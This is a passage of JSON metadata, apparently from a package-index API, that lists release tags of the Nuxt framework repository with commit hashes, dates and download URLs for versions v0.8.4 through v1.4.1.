z/v1.4.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.1/manifests"},{"name":"v1.4.0","sha":"85b584693cd1e689406ad722b47735fa7d0faf26","kind":"tag","published_at":"2018-03-01T16:45:11.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.4.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.4.0/manifests"},{"name":"v1.3.0","sha":"1582df149d7f18402faa58c47e080e3f0cc52a16","kind":"tag","published_at":"2018-01-31T16:13:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.3.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.3.0/manifests"},{"name":"v1.2.1","sha":"f0bd9a573b3756a6f878b3964222679a8c58beaa","kind":"tag","published_at":"2018-01-26T12:24:36.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.1/manifests"},{"name":"v1.2.0","sha":"78494dac927681007ea6725b4548db8fd838ed16","kind":"tag","published_at":"2018-01-26T11:54:27.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.2.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.2.0/manifests"},{"name":"v1.1.1","sha":"6dce671498d0128662579cfb08dd7e3e67253261","kind":"tag","published_at":"2018-01-13T13:10:46.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.1/manifests"},{"name":"v1.1.0","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1.0/manifests"},{"name":"v1.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.1/manifests"},{"name":"v1.0.1","sha":"e33d5026966e23d71dc33078a9122bf4a9fccd61","kind":"commit","published_at":"2018-01-12T15:10:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"b83d74588fa45018dd89bb6ab4b4305be7f6a50a","kind":"tag","published_at":"2018-01-08T16:07:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc11","sha":"034df15231fa7986cf626ccc48305a0ba0a6cba2","kind":"commit","published_at":"2017-09-07T12:53:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc11","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"e24b4a7cc59e1b56b2a748682aa9180cd881097f","kind":"commit","published_at":"2017-09-07T12:31:45.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc10","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"226a8701b4f18cf213adb8f474c052adf2376ded","kind":"commit","published_at":"2017-09-06T13:34:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"63bc512d73660986546bd2428649d0299a6a0abd","kind":"commit","published_at":"2017-08-30T16:36:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"138edc7bfdbc9617a3f4e245f9bd32d0fcfc3a2b","kind":"commit","published_at":"2017-08-29T12:04:41.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"b931dd40cea828021f3092d1e224053a1baacba0","kind":"commit","published_at":"2017-08-21T20:08:39.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"e34d9d69bb44301976e1ee78fcd454b904f7701a","kind":"commit","published_at":"2017-08-21T08:38:06.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"533c8a9fb66e105ae8175bf31bff4eede5d733e1","kind":"commit","published_at":"2017-08-13T19:12:35.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-rc3/manifests"},{"name":"1.0.0-rc3","sha":"8563c0f05fca617eb296544ac1f84f96cf470c5f","kind":"commit","published_at":"2017-07-28T08:40:25.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/1.0.0-rc3","html_url":"https://github.com/nuxt/nuxt/releases/tag/1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/1.0.0-rc3/manifests"},{"name":"v1.0.0-alpha.4","sha":"d15a50f539e74a510353d06e9a247e5cec77850e","kind":"commit","published_at":"2017-06-06T12:57:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.4/manifests"},{"name":"v1.0.0-alpha.3","sha":"2f32d03f83de48fc13718815e38197446d538b5e","kind":"commit","published_at":"2017-06-04T12:11:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha.3/manifests"},{"name":"v1.0.0-alpha2","sha":"03f2e133b140d78870971ad4eadd00f14c244a2c","kind":"commit","published_at":"2017-05-29T15:04:01.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha2/manifests"},{"name":"v1.0.0-alpha1","sha":"7f337cdadf6e2b7b4b1a2b9f549c19aac33a794d","kind":"commit","published_at":"2017-05-21T19:08:32.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v1.0.0-alpha1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v1.0.0-alpha1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v1.0.0-alpha1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v1.0.0-alpha1/manifests"},{"name":"v0.10.7","sha":"5d4f2899110b061ca8e084354e1a8b400280df14","kind":"commit","published_at":"2017-04-29T23:31:42.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.7/manifests"},{"name":"v0.10.6","sha":"854e262445db60f8bfee2483e3e723b7be4dc35a","kind":"commit","published_at":"2017-04-17T13:58:43.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.6/manifests"},{"name":"v0.10.5","sha":"704ff5e5775736cfe0e7030cbdc0b9cc2cb198d3","kind":"commit","published_at":"2017-03-25T23:54:12.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.5/manifests"},{"name":"v0.10.4","sha":"5ff6424e09eb2262b975c9c544c57e681fbf7591","kind":"commit","published_at":"2017-03-25T18:03:28.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.4/manifests"},{"name":"v0.10.3","sha":"c9784651e9c482ad90ec9c39359ac9dfd1e199bf","kind":"commit","published_at":"2017-03-25T11:57:38.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.3/manifests"},{"name":"v0.10.2","sha":"77439223cfb9d3c64928d8888113898f4b1fa5d3","kind":"commit","published_at":"2017-03-25T11:36:58.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.2/manifests"},{"name":"v0.10.1","sha":"ea5881e64a797ded299740017391f36ea7f94e09","kind":"commit","published_at":"2017-03-25T02:41:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.1/manifests"},{"name":"v0.10.0","sha":"bfe62b7d71d4ac64a4d411a83cec808824082b4f","kind":"commit","published_at":"2017-03-24T18:05:57.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.10.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.10.0/manifests"},{"name":"v0.9.9","sha":"df04b959c219789621f1f4ce239fb2f64c069eee","kind":"commit","published_at":"2017-02-10T23:41:15.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.9","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.9/manifests"},{"name":"v0.9.8","sha":"e7f0200a58f17d429b00641d015e6f7f87f99fd0","kind":"commit","published_at":"2017-02-10T01:22:33.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.8/manifests"},{"name":"v0.9.7","sha":"8d17d20dba2a81072173c68fa774d7a49cae716a","kind":"commit","published_at":"2017-01-30T11:41:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.7","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.7/manifests"},{"name":"v0.9.6","sha":"1556787e0164bdb4b15542dedf32762c481f274c","kind":"commit","published_at":"2017-01-15T16:33:18.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.6/manifests"},{"name":"v0.9.5","sha":"42a3b007514eea3e87a4bd0c083dad6524ecfead","kind":"commit","published_at":"2016-12-27T16:07:50.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.5/manifests"},{"name":"v0.9.4","sha":"05be1ed6b12e7d88fe7adc2af5ed0568cf40ddb0","kind":"commit","published_at":"2016-12-25T20:15:17.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.4/manifests"},{"name":"v0.9.3","sha":"1fc685a88037fdac0b826d8d814fcd1c3b320fda","kind":"commit","published_at":"2016-12-24T18:00:30.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.3","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.3/manifests"},{"name":"v0.9.2","sha":"2a9519e7203004955ffc70f0c8f762e6afeb9816","kind":"commit","published_at":"2016-12-23T12:09:22.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.2","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.2/manifests"},{"name":"v0.9.1","sha":"baaaefbf2c76f362fd0be9f34c1444e439e8c746","kind":"commit","published_at":"2016-12-20T11:55:48.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.1","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.1/manifests"},{"name":"v0.9.0","sha":"004e21b929b901ae54d92abf339c51a9d666b373","kind":"commit","published_at":"2016-12-19T19:37:24.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.9.0","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.9.0/manifests"},{"name":"v0.8.8","sha":"803b21bf17a21bac5eb97d84de35fa7d08c3b73e","kind":"commit","published_at":"2016-12-09T19:10:04.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.8","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.8/manifests"},{"name":"v0.8.6","sha":"d482711cbe2a9f50a6a4804bdf1292739dd581ab","kind":"commit","published_at":"2016-12-09T12:52:08.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.6","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.6/manifests"},{"name":"v0.8.5","sha":"151bd73b8250816c3918e52777e9a7387df7be4a","kind":"commit","published_at":"2016-12-09T12:46:59.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.5","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/nuxt/nuxt@v0.8.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/nuxt%2Fnuxt/tags/v0.8.5/manifests"},{"name":"v0.8.4","sha":"e254e1117736f73a3455b0f795e9f9bd9e0364ab","kind":"commit","published_at":"2016-12-08T20:15:00.000Z","download_url":"https://codeload.github.com/nuxt/nuxt/tar.gz/v0.8.4","html_url":"https://github.com/nuxt/nuxt/releases/tag/v0.8.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"p